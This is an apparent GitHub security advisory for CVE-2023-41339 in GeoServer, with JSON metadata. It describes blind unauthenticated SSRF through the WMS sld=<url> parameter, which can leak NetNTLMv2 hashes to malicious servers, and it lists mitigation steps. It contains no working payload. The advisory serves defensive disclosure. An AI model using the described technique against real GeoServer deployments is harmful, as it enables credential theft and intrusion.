GHSA-CQPC-X2C6-2GMF

Vulnerability from github – Published: 2023-10-24 19:20 – Updated: 2024-03-06 23:57
VLAI?
Summary
Unsecured WMS dynamic styling sld=<url> parameter affords blind unauthenticated SSRF
Details

Summary

The WMS specification defines an sld=<url> parameter for GetMap, GetLegendGraphic and GetFeatureInfo operations for user supplied "dynamic styling". Enabling the use of dynamic styles, without also configuring URL checks, provides the opportunity for Service Side Request Forgery.

It is possible to use this for "Blind SSRF" on the WMS endpoint to steal NetNTLMv2 hashes via file requests to malicious servers.

Details

This vulnerability requires:

  • WMS Settings dynamic styling being enabled
  • Security URL checks to be disabled, or to be enabled and allowing file:\\* access

Impact

This vulnerability can be used to steal user NetNTLMv2 hashes which could be relayed or cracked externally to gain further access.

Mitigation

The ability to reference an external URL location is defined by the WMS standard GetMap, GetFeatureInfo and GetLegendGraphic operations. These operations are defined by an Industry and International standard and cannot be redefined by the GeoServer application in isolation.

To disable dynamic styling on GeoServer 2.10.3 and GeoServer 2.11.1:

  1. Navigate to Services > WMS Settings page
  2. Locate Dynamic styling heading
  3. Select the Disable usage of SLD and SLD_BODY parameters in GET requests and user styles in POST checkbox.

Resolution

To allow dynamic styling safely on GeoServer 2.22.5 and GeoServer 2.23.2:

  1. Navigate to Security > URL Checks
  2. Enable URL Checks are enabled setting
  3. Check the user manual for examples of how to trust specific locations: ^https://styles\.server\.net/cartography/.*$
  4. Enable dynamic styling on the Services > WMS Settings page, deselect the Disable usage of SLD and SLD_BODY parameters in GET requests and user styles in POST checkbox.

Use of dynamic styling safely is on by default in GeoServer 2.24.0.

References

Severity ?
5.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.geoserver:gs-wms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.22.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.geoserver:gs-wms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.23.0"
            },
            {
              "fixed": "2.23.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.geoserver.web:gs-web-app"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.22.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.geoserver.web:gs-web-app"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.23.0"
            },
            {
              "fixed": "2.23.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-41339"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-10-24T19:20:34Z",
    "nvd_published_at": "2023-10-25T18:17:30Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe WMS specification defines an ``sld=\u003curl\u003e`` parameter for GetMap, GetLegendGraphic and GetFeatureInfo operations for user supplied \"dynamic styling\".  Enabling the use of dynamic styles, without also configuring URL checks, provides the opportunity for Service Side Request Forgery.\n \nIt is possible to use this for \"Blind SSRF\" on the WMS endpoint to steal NetNTLMv2 hashes via file requests to malicious servers.\n\n### Details\n\nThis vulnerability requires:\n\n* WMS Settings dynamic styling being enabled\n* Security URL checks to be disabled, or to be enabled and allowing ``file:\\\\*`` access\n\n### Impact\n\nThis vulnerability can be used to steal user NetNTLMv2 hashes which could be relayed or cracked externally to gain further access.\n\n### Mitigation\n\nThe ability to reference an external URL location is defined by the WMS standard GetMap, GetFeatureInfo and GetLegendGraphic operations. These operations are defined by an Industry and International standard and cannot be redefined by the GeoServer application in isolation.\n\nTo disable dynamic styling on GeoServer 2.10.3 and GeoServer 2.11.1:\n\n1. Navigate to **Services \u003e WMS Settings** page\n2. Locate **Dynamic styling** heading\n3. Select the **Disable usage of SLD and SLD_BODY parameters in GET requests and user styles in POST** checkbox.\n\n### Resolution\n\nTo allow dynamic styling safely on GeoServer 2.22.5 and GeoServer 2.23.2:\n\n1. Navigate to **Security \u003e URL Checks**\n2. Enable **URL Checks are enabled** setting\n3. Check the user manual for [examples](https://docs.geoserver.org/latest/en/user/security/urlchecks.html#example-regex-patterns) of how to trust specific locations:\n   ``^https://styles\\.server\\.net/cartography/.*$``\n4. Enable dynamic styling on the **Services \u003e WMS Settings** page, deselect the **Disable usage of SLD and SLD_BODY parameters in GET requests and user styles in POST** checkbox.\n\nUse of dynamic styling safely is on by default in GeoServer 2.24.0.\n\n### References\n\n* [Disabling usage of dynamic styling in GetMap, GetFeatureInfo and GetLegendGraphic requests](https://docs.geoserver.org/latest/en/user/services/wms/webadmin.html#disabling-usage-of-dynamic-styling-in-getmap-getfeatureinfo-and-getlegendgraphic-requests)\n* [URL Checks](https://docs.geoserver.org/latest/en/user/security/urlchecks.html)",
  "id": "GHSA-cqpc-x2c6-2gmf",
  "modified": "2024-03-06T23:57:16Z",
  "published": "2023-10-24T19:20:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-cqpc-x2c6-2gmf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41339"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/geoserver/geoserver"
    },
    {
      "type": "WEB",
      "url": "https://github.com/geoserver/geoserver/releases/tag/2.22.5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/geoserver/geoserver/releases/tag/2.23.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Unsecured WMS dynamic styling sld=\u003curl\u003e parameter affords blind unauthenticated SSRF"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.